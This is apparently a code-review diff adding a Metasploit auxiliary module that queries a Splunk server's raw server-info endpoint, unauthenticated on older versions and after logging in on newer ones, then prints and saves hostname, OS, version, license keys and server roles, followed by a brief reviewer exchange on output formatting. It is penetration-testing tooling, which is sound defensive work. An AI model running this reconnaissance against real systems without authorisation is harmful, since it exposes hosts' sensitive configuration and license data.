modules/auxiliary/gather/splunk_raw_server_info.rb

```diff
@@ -0,0 +1,137 @@
+      'password' => datastore['PASSWORD'],
+      'cval' => cval_value,
+      'set_has_logged_in' => 'false'
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => login_url,
+      'cookie' => res.get_cookies,
+      'vars_post' => auth_payload
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')
+    end
+
+    print_good('Successfully authenticated on the Splunk instance')
+    res.get_cookies
+  end
+
+  def get_contents(cookie = nil)
+    request = {
+      'uri' => normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'services', 'server', 'info', 'server-info'),
+      'vars_get' => {
+        'output_mode' => 'json'
+      }
+    }
+    request['cookie'] = cookie unless cookie.nil?
+    res = send_request_cgi(request)
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    # 200 is <6.6.0 success, 303 is >=6.6.0 likely success but need auth first
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response(response code: #{res.code})") unless res.code == 200 || res.code == 303
+    res
+  end
+
+  def run
+    # on 6.2.x-6.5.x this will work as its unauth
+    res = get_contents
+    # if we hit 6.6.0 - 7.1.0 we need to auth first
+    if res.body == '{"messages":[{"type":"ERROR","text":"See Other"}]}'
+      print_status('Authentication required, logging in and re-attempting')
+      res = get_contents(authenticate)
+    end
+
+    begin
+      j = JSON.parse(res.body)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Response not JSON parsable')
+    end
+
+    loot_path = store_loot('splunk.system.status', 'application/json', datastore['RHOST'], res.body, 'system_status.json')
+    print_good("Output saved to #{loot_path}")
+
+    print_good("Hostname: #{j['entry'][0]['content']['host_fqdn']}")
+    print_good("CPU Architecture: #{j['entry'][0]['content']['cpu_arch']}")
+    print_good("Operating System: #{j['entry'][0]['content']['os_name']}")
+    print_good("OS Build: #{j['entry'][0]['content']['os_build']}")
+    print_good("OS Version: #{j['entry'][0]['content']['os_version']}")
+    print_good("Splunk Version: #{j['generator']['version']}")
+    print_good("Trial Version?: #{j['entry'][0]['content']['isTrial']}")
+    print_good("Splunk Forwarder?: #{j['entry'][0]['content']['isForwarding']}")
+    print_good("Splunk Product Type: #{j['entry'][0]['content']['product_type']}")
+    print_good("License State: #{j['entry'][0]['content']['licenseState']}")
+    print_good("License Key\(s\): #{j['entry'][0]['content']['licenseKeys']}")
+    print_good("Splunk Server Roles: #{j['entry'][0]['content']['server_roles']}")
+    converted_time = DateTime.strptime(j['entry'][0]['content']['startup_time'].to_s, '%s').strftime('%Y-%m-%d %H:%M:%S')
+    print_good("Splunk Server Startup Time: #{converted_time}")
```

Comment:
Would it make sense to use a Rex Table here?

Reply:
depending on license key length, it may be hard to read if its super long. It could cleanup slightly by putting each entry into a row for the table.

Reply:
I'd say my original suggestion can be disregarded then. Thanks! 🚀